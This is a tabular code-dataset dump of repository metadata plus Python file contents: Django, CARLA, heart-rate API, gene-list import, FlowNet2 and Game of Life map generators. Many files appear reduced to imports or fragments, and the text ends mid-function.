hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a1d3d2bbc91fe562ff03d1024258dfe9a2092f42 | 4,237 | py | Python | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 5 | 2020-02-07T23:24:05.000Z | 2021-07-23T23:37:41.000Z | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 11 | 2020-01-13T10:02:33.000Z | 2022-02-10T14:42:36.000Z | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 11 | 2020-02-07T23:24:09.000Z | 2020-10-16T14:57:54.000Z | from django.contrib import admin
from django.http import HttpResponse
from django.urls import path
from django.shortcuts import render, HttpResponse, redirect
from django import forms
import os
import csv
from io import TextIOWrapper, StringIO
from .models import Player, Team, Usage, XgLookup
| 31.619403 | 164 | 0.618126 |
a1d4680a92b1711d0003c4bd4a72a28789727f68 | 221 | py | Python | Muta3DMaps/core/__init__.py | NatureGeorge/SIFTS_Plus_Muta_Maps | 60f84e6024508e65ee3791103762b95666d3c646 | [
"MIT"
] | null | null | null | Muta3DMaps/core/__init__.py | NatureGeorge/SIFTS_Plus_Muta_Maps | 60f84e6024508e65ee3791103762b95666d3c646 | [
"MIT"
] | null | null | null | Muta3DMaps/core/__init__.py | NatureGeorge/SIFTS_Plus_Muta_Maps | 60f84e6024508e65ee3791103762b95666d3c646 | [
"MIT"
] | null | null | null | # @Created Date: 2019-11-24 09:07:07 pm
# @Filename: __init__.py
# @Email: 1730416009@stu.suda.edu.cn
# @Author: ZeFeng Zhu
# @Last Modified: 2019-12-23 04:23:51 pm
# @Copyright (c) 2019 MinghuiGroup, Soochow University
| 31.571429 | 54 | 0.714932 |
a1d5ed8760ff10427163bf99b2b4a26de7553293 | 3,217 | py | Python | tests/test_utils/test_file.py | dcambie/spectrochempy | e376082d66be7a4c528b7d83be076d77534e39bd | [
"CECILL-B"
] | 3 | 2021-04-09T09:13:21.000Z | 2022-01-09T00:05:42.000Z | tests/test_utils/test_file.py | fernandezc/spectrochempy | 4707c51dba0032c160afc40682fa16d4b9855ded | [
"CECILL-B"
] | null | null | null | tests/test_utils/test_file.py | fernandezc/spectrochempy | 4707c51dba0032c160afc40682fa16d4b9855ded | [
"CECILL-B"
] | null | null | null | # -*- coding: utf-8 -*-
# =====================================================================================================================
# Copyright () 2015-2021 LCS - Laboratoire Catalyse et Spectrochimie, Caen, France. =
# CeCILL-B FREE SOFTWARE LICENSE AGREEMENT - See full LICENSE agreement in the root directory =
# =====================================================================================================================
#
# ======================================================================================================================
# Copyright () 2015-2021 LCS - Laboratoire Catalyse et Spectrochimie, Caen, France. =
# CeCILL-B FREE SOFTWARE LICENSE AGREEMENT - See full LICENSE agreement in the root directory =
# ======================================================================================================================
from pathlib import Path
from os import environ
from os.path import join
import pytest
from spectrochempy.core import preferences as prefs
from spectrochempy import NO_DISPLAY
from spectrochempy.utils import get_filename
# EOF
| 42.893333 | 120 | 0.500155 |
a1d778137bf41265c501edad6184cfc3fae9a1be | 1,450 | py | Python | toontown/safezone/ETreasurePlannerAI.py | SuperM0use24/TT-CL-Edition | fdad8394f0656ae122b687d603f72afafd220c65 | [
"MIT"
] | null | null | null | toontown/safezone/ETreasurePlannerAI.py | SuperM0use24/TT-CL-Edition | fdad8394f0656ae122b687d603f72afafd220c65 | [
"MIT"
] | 1 | 2021-06-08T17:16:48.000Z | 2021-06-08T17:16:48.000Z | toontown/safezone/ETreasurePlannerAI.py | SuperM0use24/TT-CL-Edition | fdad8394f0656ae122b687d603f72afafd220c65 | [
"MIT"
] | 3 | 2021-06-03T05:36:36.000Z | 2021-06-22T15:07:31.000Z | from toontown.safezone.DistributedETreasureAI import DistributedETreasureAI
from toontown.safezone.RegenTreasurePlannerAI import RegenTreasurePlannerAI
| 39.189189 | 104 | 0.37931 |
a1da8b92dc0cdcfd459c2434f84a887452586f81 | 2,204 | py | Python | user_roles/role_add.py | PaloAltoNetworks/pcs-migration-management | 766c8c861befa92e593b23ad6d248e33f62054bb | [
"ISC"
] | 1 | 2022-03-17T12:51:45.000Z | 2022-03-17T12:51:45.000Z | user_roles/role_add.py | PaloAltoNetworks/pcs-migration-management | 766c8c861befa92e593b23ad6d248e33f62054bb | [
"ISC"
] | 2 | 2021-11-03T15:34:40.000Z | 2021-12-14T19:50:20.000Z | user_roles/role_add.py | PaloAltoNetworks/pcs-migration-management | 766c8c861befa92e593b23ad6d248e33f62054bb | [
"ISC"
] | 4 | 2021-11-09T17:57:01.000Z | 2022-01-24T17:41:21.000Z | from sdk.color_print import c_print
from user_roles import role_translate_id
from tqdm import tqdm | 42.384615 | 108 | 0.606624 |
a1dabed16e80b17dead966e6cd7f52d07e673b7f | 6,641 | py | Python | Apps/phdigitalshadows/dsapi/service/ds_base_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 74 | 2019-10-22T02:00:53.000Z | 2022-03-15T12:56:13.000Z | Apps/phdigitalshadows/dsapi/service/ds_base_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 375 | 2019-10-22T20:53:50.000Z | 2021-11-09T21:28:43.000Z | Apps/phdigitalshadows/dsapi/service/ds_base_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 175 | 2019-10-23T15:30:42.000Z | 2021-11-05T21:33:31.000Z | # File: ds_base_service.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
import json
import time
import base64
from functools import wraps
from ..config import ds_api_host, ds_api_base
from .ds_abstract_service import DSAbstractService
| 38.166667 | 111 | 0.511971 |
a1dac102f27e519bf75cf582e4948e7c1ea1984f | 4,216 | py | Python | examples/motion_planning.py | luisgaboardi/Motion-Planning-Carla-Simulator | 4270fd3b7e488876a8ac249c217a7fb219e8d27b | [
"MIT"
] | null | null | null | examples/motion_planning.py | luisgaboardi/Motion-Planning-Carla-Simulator | 4270fd3b7e488876a8ac249c217a7fb219e8d27b | [
"MIT"
] | 4 | 2021-05-13T11:33:06.000Z | 2022-02-08T06:26:55.000Z | examples/motion_planning.py | luisgaboardi/Motion-Planning-Carla-Simulator | 4270fd3b7e488876a8ac249c217a7fb219e8d27b | [
"MIT"
] | null | null | null | # Imports para o Carla
import glob
import os
import sys
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
try:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/carla')
except IndexError:
pass
from agents.navigation.unb_agent import Agent
"""
Esse script consiste na implementao de alguns mdulos de veculos autnomos:
- Controladores PID para controle longitudinal e lateral
- Alterao de rota dinamicamente mediante tratamento de sinal de
um sensor de obstculo posicionado na frente do viculo.
Com isso, o veculo sai de um ponto inicial, desvia de dois obstculos
mudando de faixa e detectando um semforo vermelho, para antes do cruzamento
"""
if __name__ == '__main__':
main() | 36.344828 | 164 | 0.671015 |
a1dad65039164684afc4c0a9e16a88052f3e201e | 5,705 | py | Python | hr_api.py | AznStevy/heart_rate_sentinel_server | e241ee705221be643a3c3773a2e5ed9c129c733f | [
"MIT"
] | null | null | null | hr_api.py | AznStevy/heart_rate_sentinel_server | e241ee705221be643a3c3773a2e5ed9c129c733f | [
"MIT"
] | 4 | 2018-11-13T20:44:50.000Z | 2018-11-16T19:47:09.000Z | hr_api.py | AznStevy/heart_rate_sentinel_server | e241ee705221be643a3c3773a2e5ed9c129c733f | [
"MIT"
] | null | null | null | import json
import requests
post_url = "http://127.0.0.1:5000/api/"
# ---------- general web interfacing ----------------------
def post(endpoint, payload, uri="http://127.0.0.1:5000/api/"):
"""
Posts to the flask web server.
Args:
endpoint: The endpoint of the API
payload: Payload according to what the web server requires.
uri: Web server uri.
Returns:
object: Response from web server.
"""
return requests.post(uri + endpoint, json=payload)
def get(endpoint, uri="http://127.0.0.1:5000/api/"):
"""
Gets from the flask web server.
Args:
endpoint: The endpoint of the API
uri: Web server uri.
Returns:
object: Response from web server.
"""
return requests.get(uri + endpoint)
# ---------- API ----------------------
def get_all_patients():
"""
Obtains a list of all patients in the database. (For testing)
Returns:
dict: All patients currently in database referenced by ID.
"""
resp = get("all_patients")
return byte_2_json(resp)
def add_new_patient(patient_id: str, attending_email: str, user_age: int):
"""
Adds new patient to the database.
Args:
patient_id: ID of the patient.
attending_email: Email of the user
user_age: Age of the user.
Returns:
dict: Patient that added.
"""
payload = {
"patient_id": patient_id,
"attending_email": attending_email,
"user_age": user_age
}
resp = post("new_patient", payload)
return byte_2_json(resp)
def get_interval_average(patient_id: str, timestamp: str):
"""
Gets the average heart rate from before a timestamp.
Args:
patient_id: ID of the patient.
timestamp: timestamp in form YYYY-MM-DD HH:MM:SS.#######
Returns:
float: Average heart rate from before the timestamp.
"""
payload = {
"patient_id": patient_id,
"heart_rate_average_since": timestamp,
}
resp = post("heart_rate/interval_average", payload)
return byte_2_json(resp)
def post_heart_rate(patient_id: str, heart_rate: int):
"""
Posts a heart rate to a patient. Timestamp automatically generated.
Args:
patient_id: ID of the patient.
heart_rate: Heart rate to post.
Returns:
dict: Updated patient information.
"""
payload = {
"patient_id": patient_id,
"heart_rate": heart_rate,
}
resp = post("heart_rate", payload)
return byte_2_json(resp)
def get_patient_status(patient_id: str):
"""
Obtains patient status. Sends email if tachychardic.
Args:
patient_id: ID of the patient.
Returns:
tuple: first is if tachychardic, second is timestamp.
"""
resp = get("status/{}".format(patient_id))
return byte_2_json(resp)
def get_heart_rate(patient_id: str):
"""
Obtains all heart rates from the
Args:
patient_id: ID of the patient.
Returns:
list: List of all heart rates from the patient.
"""
resp = get("heart_rate/{}".format(patient_id))
return byte_2_json(resp)
def get_heart_rate_average(patient_id: str):
"""
Obtains an average heart rate of the patient.
Args:
patient_id: ID of the patient.
Returns:
float: Average heart rate of the patient.
"""
resp = get("heart_rate/average/{}".format(patient_id))
return byte_2_json(resp)
def byte_2_json(resp):
"""
Converts bytes to json. Raises exception if necessary.
Args:
resp (bytes): Response from request.
Returns:
dict: Json object of interest.
"""
json_resp = json.loads(resp.content.decode('utf-8'))
json_resp = error_catcher(json_resp)
return json_resp
def error_catcher(json_resp: dict):
"""
Raises appropriate exceptions from the web server.
Args:
json_resp: Information from the server.
Returns:
dict: The original dictionary if not error.
"""
if type(json_resp) == dict and "error_type" in json_resp.keys():
if "TypeError" in json_resp["error_type"]:
raise TypeError(json_resp["msg"])
if "AttributeError" in json_resp["error_type"]:
raise AttributeError(json_resp["msg"])
if "ValueError" in json_resp["error_type"]:
raise ValueError(json_resp["msg"])
return json_resp
if __name__ == "__main__":
from random import choice
from string import ascii_uppercase
p_id = ''.join(choice(ascii_uppercase) for _ in range(10))
print(p_id)
r = add_new_patient(p_id, "szx2@duke.edu", 21)
print(r)
r = post_heart_rate(p_id, 80)
print("Posted: ", r)
hr = get_heart_rate(p_id)
print("All Heartrates:", hr)
r = post_heart_rate(p_id, 90)
print("Posted: ", r)
av = get_heart_rate_average(p_id)
print("Average: ", av)
hr = get_heart_rate(p_id)
print("All Heartrates:", hr)
curr_status, timestamp = get_patient_status(p_id)
print("Current Status 1 (False/Not Tach): ", curr_status, "Timestamp: ", timestamp)
int_avg = get_interval_average(p_id, timestamp)
print("Interval Average (should be 85):", int_avg)
r = post_heart_rate(p_id, 100)
print("Posted: ", r)
hr = get_heart_rate(p_id)
print("All Heartrates:", hr)
r = post_heart_rate(p_id, 110)
curr_status, _ = get_patient_status(p_id)
print("Current Status 2 (True/Tach + sends email): ", curr_status, "Timestamp: ", timestamp)
av = get_heart_rate_average(p_id)
print("Average (95): ", av)
int_avg = get_interval_average(p_id, timestamp)
print("Interval Average (should be 85):", int_avg)
| 26.169725 | 96 | 0.632954 |
a1dba833aadc169502823d1b0bf416f69fbfd572 | 1,845 | py | Python | upload/tasks/import_gene_list_task.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 5 | 2021-01-14T03:34:42.000Z | 2022-03-07T15:34:18.000Z | upload/tasks/import_gene_list_task.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 551 | 2020-10-19T00:02:38.000Z | 2022-03-30T02:18:22.000Z | upload/tasks/import_gene_list_task.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | null | null | null | from genes.gene_matching import tokenize_gene_symbols, GeneSymbolMatcher
from genes.models import GeneList
from snpdb.models import ImportStatus
from upload.models import UploadedGeneList
from upload.tasks.import_task import ImportTask
from variantgrid.celery import app
ImportGeneListTask = app.register_task(ImportGeneListTask()) # @UndefinedVariable
| 37.653061 | 117 | 0.750678 |
a1dd42d9f4784232b6f6958623ffb26f5fc9185f | 467 | py | Python | Covid Dashboard/loadconfig.py | jamespilcher/daily-covid-dashboard | 4f71eba2216dcda4b577baeb37a97a3abf4fe1bd | [
"MIT"
] | null | null | null | Covid Dashboard/loadconfig.py | jamespilcher/daily-covid-dashboard | 4f71eba2216dcda4b577baeb37a97a3abf4fe1bd | [
"MIT"
] | null | null | null | Covid Dashboard/loadconfig.py | jamespilcher/daily-covid-dashboard | 4f71eba2216dcda4b577baeb37a97a3abf4fe1bd | [
"MIT"
] | null | null | null | """Loads the config.json file and store key value pairs into variables"""
import json
with open('config.json', 'r', encoding='utf-8') as f:
config = json.load(f)
config_location_type = config['location_type']
config_location = config['location']
country = config['country']
config_covid_terms = config['covid_terms']
newsAPI_key = config['newsAPI_key']
news_outlet_websites = config['news_outlet_websites']
webpage_url = config["local_host_url"]
| 31.133333 | 74 | 0.734475 |
a1de14ec6277bfec1f83bc1158b25a9e6f73c868 | 65 | py | Python | autoprotocol/version.py | kevin-ss-kim/autoprotocol-python | f55818e31b5c49bc093291f3ecc452f2b061e0a9 | [
"BSD-3-Clause"
] | null | null | null | autoprotocol/version.py | kevin-ss-kim/autoprotocol-python | f55818e31b5c49bc093291f3ecc452f2b061e0a9 | [
"BSD-3-Clause"
] | null | null | null | autoprotocol/version.py | kevin-ss-kim/autoprotocol-python | f55818e31b5c49bc093291f3ecc452f2b061e0a9 | [
"BSD-3-Clause"
] | null | null | null | """Maintains current version of package"""
__version__ = "6.1.2"
| 21.666667 | 42 | 0.707692 |
a1df17bbb39f33b932712fb69914ace1053665c5 | 51,350 | py | Python | models/flownet2.py | D-Nilsson/GRFP | 539fe2a9ecbd5daf60e20ce56af872d90ba60a4b | [
"MIT"
] | 58 | 2018-06-13T13:58:51.000Z | 2022-03-08T03:07:10.000Z | models/flownet2.py | yyyyqy/GRFP | 539fe2a9ecbd5daf60e20ce56af872d90ba60a4b | [
"MIT"
] | 13 | 2018-07-10T07:50:54.000Z | 2021-06-09T17:55:16.000Z | models/flownet2.py | yyyyqy/GRFP | 539fe2a9ecbd5daf60e20ce56af872d90ba60a4b | [
"MIT"
] | 11 | 2018-06-13T17:00:42.000Z | 2022-03-01T03:15:24.000Z | import glob, os
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge | 63.473424 | 253 | 0.574761 |
a1e2e6423c6af48c84a3959d270e3cdaa9b51fa4 | 874 | py | Python | mdm/utils.py | agnihotri7/dj_mdm | 9fc68393d270d361d2a37b726282277b15121658 | [
"MIT"
] | null | null | null | mdm/utils.py | agnihotri7/dj_mdm | 9fc68393d270d361d2a37b726282277b15121658 | [
"MIT"
] | null | null | null | mdm/utils.py | agnihotri7/dj_mdm | 9fc68393d270d361d2a37b726282277b15121658 | [
"MIT"
] | null | null | null | """
"""
import sys
import uuid
import base64
import fileinput
import datetime
from django.utils import timezone
from django.conf import settings
from django.shortcuts import get_object_or_404
from urlparse import urlparse, parse_qs
from APNSWrapper import *
from mdm.models import MDMDevice, DeviceCommand
| 25.705882 | 71 | 0.751716 |
a1e35648e878d2c215539f5ee4e619b32ea82f3c | 34,207 | py | Python | gollyx_maps/rainbow.py | golly-splorts/gollyx-maps | ad57b6e0665a7f2a54f2cfa31717ce152ac3d046 | [
"MIT"
] | null | null | null | gollyx_maps/rainbow.py | golly-splorts/gollyx-maps | ad57b6e0665a7f2a54f2cfa31717ce152ac3d046 | [
"MIT"
] | null | null | null | gollyx_maps/rainbow.py | golly-splorts/gollyx-maps | ad57b6e0665a7f2a54f2cfa31717ce152ac3d046 | [
"MIT"
] | null | null | null | import math
import itertools
from operator import itemgetter
import json
import os
import random
from .geom import hflip_pattern, vflip_pattern, rot_pattern
from .patterns import (
get_pattern_size,
get_pattern_livecount,
get_grid_empty,
get_grid_pattern,
segment_pattern,
methuselah_quadrants_pattern,
pattern_union,
cloud_region,
)
from .utils import pattern2url, retry_on_failure
from .error import GollyXPatternsError, GollyXMapsError
##############
# Util methods
def rainbow_methuselah_quadrants_pattern(
rows, cols, seed=None, methuselah_counts=None, fixed_methuselah=None
):
"""
Add methuselahs to each quadrant.
If the user does not specify any args,
this fills the quadrants with lots of
small methuselahs.
The user can specify which methuselahs
to use and how many to use, so e.g.
can specify 1 methuselah per quadrant, etc.
"""
# set rng seed (optional)
if seed is not None:
random.seed(seed)
small_methuselah_names = [
"bheptomino",
"cheptomino",
"eheptomino",
"piheptomino",
"rpentomino",
]
reg_methuselah_names = [
"acorn",
"bheptomino",
"cheptomino",
"eheptomino",
"multuminparvo",
"piheptomino",
"rabbit",
"rpentomino",
]
BIGDIMLIMIT = 150
mindim = min(rows, cols)
if methuselah_counts is None:
if mindim < BIGDIMLIMIT:
methuselah_counts = [3, 4, 9]
else:
methuselah_counts = [3, 4, 9, 16]
if fixed_methuselah is None:
if mindim < BIGDIMLIMIT:
methuselah_names = reg_methuselah_names + small_methuselah_names
else:
methuselah_names = small_methuselah_names
else:
methuselah_names = [fixed_methuselah]
valid_mc = [1, 2, 3, 4, 9, 16]
for mc in methuselah_counts:
if mc not in valid_mc:
msg = "Invalid methuselah counts passed: must be in {', '.join(valid_mc)}\n"
msg += "you specified {', '.join(methuselah_counts)}"
raise GollyXPatternsError(msg)
# Put a cluster of methuselahs in each quadrant,
# one quadrant per team.
# Procedure:
# place random methuselah patterns in each quadrant corner
# Store each quadrant and its upper left corner in (rows from top, cols from left) format
quadrants = [
(1, (0, cols // 2)),
(2, (0, 0)),
(3, (rows // 2, 0)),
(4, (rows // 2, cols // 2)),
]
rotdegs = [0, 90, 180, 270]
all_methuselahs = []
for iq, quad in enumerate(quadrants):
count = random.choice(methuselah_counts)
if count == 1:
# Only one methuselah in this quadrant, so use the center
jitterx = 4
jittery = 4
corner = quadrants[iq][1]
y = corner[0] + rows // 4 + random.randint(-jittery, jittery)
x = corner[1] + cols // 4 + random.randint(-jitterx, jitterx)
meth = random.choice(methuselah_names)
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 2 or count == 4:
# Two or four methuselahs in this quadrant, so place at corners of a square
# Form the square by cutting the quadrant into thirds
if count == 4:
jitterx = 3
jittery = 3
else:
jitterx = 5
jittery = 5
corner = quadrants[iq][1]
# Slices and partitions form the inside square
nslices = 2
nparts = nslices + 1
posdiag = bool(random.getrandbits(1))
for a in range(1, nparts):
for b in range(1, nparts):
proceed = False
if count == 2:
if (posdiag and a == b) or (
not posdiag and a == (nslices - b + 1)
):
proceed = True
elif count == 4:
proceed = True
if proceed:
y = (
corner[0]
+ a * ((rows // 2) // nparts)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nparts)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 3 or count == 9:
# Three or nine methuselahs, place these on a square with three points per side
# or eight points total
if count == 9:
jitterx = 3
jittery = 3
else:
jitterx = 5
jittery = 5
corner = quadrants[iq][1]
nslices = 4
for a in range(1, nslices):
for b in range(1, nslices):
proceed = False
if count == 3:
if a == b:
proceed = True
elif count == 9:
proceed = True
if proceed:
y = (
corner[0]
+ a * ((rows // 2) // nslices)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nslices)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 16:
# Sixteen methuselahs, place these on a 4x4 square
jitterx = 2
jittery = 2
corner = quadrants[iq][1]
nslices = 5
for a in range(1, nslices):
for b in range(1, nslices):
y = (
corner[0]
+ a * ((rows // 2) // nslices)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nslices)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
random.shuffle(all_methuselahs)
# Sort by number of live cells
all_methuselahs.sort(key=itemgetter(0), reverse=True)
team1_patterns = []
team2_patterns = []
team3_patterns = []
team4_patterns = []
asc = [1, 2, 3, 4]
ascrev = list(reversed(asc))
serpentine_pattern = asc + ascrev
for i, (_, methuselah_pattern) in enumerate(all_methuselahs):
serpix = i % len(serpentine_pattern)
serpteam = serpentine_pattern[serpix]
if serpteam == 1:
team1_patterns.append(methuselah_pattern)
elif serpteam == 2:
team2_patterns.append(methuselah_pattern)
elif serpteam == 3:
team3_patterns.append(methuselah_pattern)
elif serpteam == 4:
team4_patterns.append(methuselah_pattern)
team1_pattern = pattern_union(team1_patterns)
team2_pattern = pattern_union(team2_patterns)
team3_pattern = pattern_union(team3_patterns)
team4_pattern = pattern_union(team4_patterns)
return team1_pattern, team2_pattern, team3_pattern, team4_pattern
#############
# Map methods
def random_fourcolor(rows, cols, seed=None):
"""
Generate a random four-color list life initialization.
Returns: four listlife strings,
with the random initializations.
(8-20% of all cells are alive).
Strategy: generate a set of (x,y) tuples,
convert to list, split in four. Use those
point sets to create listLife URL strings.
"""
if seed is not None:
random.seed(seed)
density = random.randint(8, 18) / 100.0
ncells = rows * cols
nlivecells = 4 * ((density * ncells) // 4)
points = set()
while len(points) < nlivecells:
randy = random.randint(0, rows - 1)
randx = random.randint(0, cols - 1)
points.add((randx, randy))
points = list(points)
pattern_urls = []
# Loop over each team
for i in range(4):
# Subselection of points
q = len(points) // 4
start_ix = i * q
end_ix = (i + 1) * q
this_points = set(points[start_ix:end_ix])
# Assemble pattern
this_pattern = []
for y in range(rows):
this_row = []
for x in range(cols):
if (x, y) in this_points:
this_row.append("o")
else:
this_row.append(".")
this_rowstr = "".join(this_row)
this_pattern.append(this_rowstr)
this_url = pattern2url(this_pattern)
pattern_urls.append(this_url)
return tuple(pattern_urls)
def _eightb_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "bheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eightc_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "cheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eighte_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "eheptomino", spacing=7)
urls = (pattern2url(p) for p in patterns)
return urls
def _eightpi_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "piheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eightr_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "rpentomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _rainburst_fourcolor(rows, cols, seed=None, sunburst=False):
"""
Create a Gaussian normal distribution in the top left and bottom right quadrants,
then slice it into radial pieces, which makes a nice rainbow shape.
"""
SMOL = 1e-12
if seed is not None:
random.seed(seed)
# Algorithm:
# set the slope
# generate (x, y) points
# if slope < 1/g, A
# if slope < 1, B
# if slope < g: C
# else: D
density = random.randint(8, 18)/100.0
nteams = 4
ncells = rows * cols
npointsperteam = (ncells//nteams)*density
nlivecells = nteams*npointsperteam
centerx = cols // 2
centery = rows // 2
teams_points = []
g = 2.5
slope_checks = [
0,
1/g,
1,
g,
]
urls = []
for iteam in range(nteams):
team_points = set()
while len(team_points) < npointsperteam:
randx = int(random.gauss(centerx, centerx // 2))
randy = int(random.gauss(centery, centery // 2))
slope = (randy - centery) / (randx - centerx + SMOL)
if iteam==0:
if slope > slope_checks[iteam] and slope < slope_checks[iteam+1]:
team_points.add((randx, randy))
elif iteam==1:
if slope > slope_checks[iteam] and slope < slope_checks[iteam+1]:
team_points.add((randx, randy))
elif iteam==2:
if slope > slope_checks[iteam] and slope < slope_checks[iteam+1]:
team_points.add((randx, randy))
elif iteam==3:
if slope > slope_checks[iteam]:
team_points.add((randx, randy))
team_pattern = []
for y in range(rows):
team_row = []
for x in range(cols):
if (x, y) in team_points:
team_row.append("o")
else:
team_row.append(".")
team_row_str = "".join(team_row)
team_pattern.append(team_row_str)
if sunburst and iteam%2==0:
team_pattern = vflip_pattern(team_pattern)
team_url = pattern2url(team_pattern)
urls.append(team_url)
random.shuffle(urls)
return tuple(urls)
def _timebomb_fourcolor(rows, cols, revenge, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
# Geometry
# L = length scale
L = 20
centerx = cols // 2
centery = rows // 2
# Each team gets one oscillator and one timebomb
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
rotdegs = [0, 90, 180, 270]
urls = [None, None, None, None]
for iteam in range(nteams):
# Location:
# x = center + a*L
# y = center + b*L
# QI: a = 1, b = 1
# QII: a = -1, b = 1
# QIII: a = -1, b = -1
# QIV: a = 1, b = -1
if iteam==0 or iteam==3:
a = 1
else:
a = -1
if iteam==0 or iteam==1:
b = 1
else:
b = -1
osc_x = centerx + a*L
osc_y = centery + b*L
bomb_x = centerx + 2*a*L
bomb_y = centery + 2*b*L
# jitter for patterns
osc_jitter_x = 3
osc_jitter_y = 3
timebomb_jitter_x = 6
timebomb_jitter_y = 6
osc_pattern = get_grid_pattern(
_get_oscillator_name(),
rows,
cols,
xoffset=osc_x + random.randint(-osc_jitter_x, osc_jitter_x),
yoffset=osc_y + random.randint(-osc_jitter_y, osc_jitter_y),
rotdeg=random.choice(rotdegs),
)
bomb_pattern = get_grid_pattern(
"timebomb",
rows,
cols,
xoffset=bomb_x + random.randint(-timebomb_jitter_x, timebomb_jitter_x),
yoffset=bomb_y + random.randint(-timebomb_jitter_y, timebomb_jitter_y),
rotdeg=random.choice(rotdegs),
)
team_pattern = pattern_union([osc_pattern, bomb_pattern])
team_url = pattern2url(team_pattern)
team_ix = team_assignments[iteam]
urls[team_ix] = team_url
return tuple(urls)
def crabs_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
rotdegs = [0, 90, 180, 270]
jitter = 1
# 8 crabs total
centerys = [rows//4, 3*rows//4]
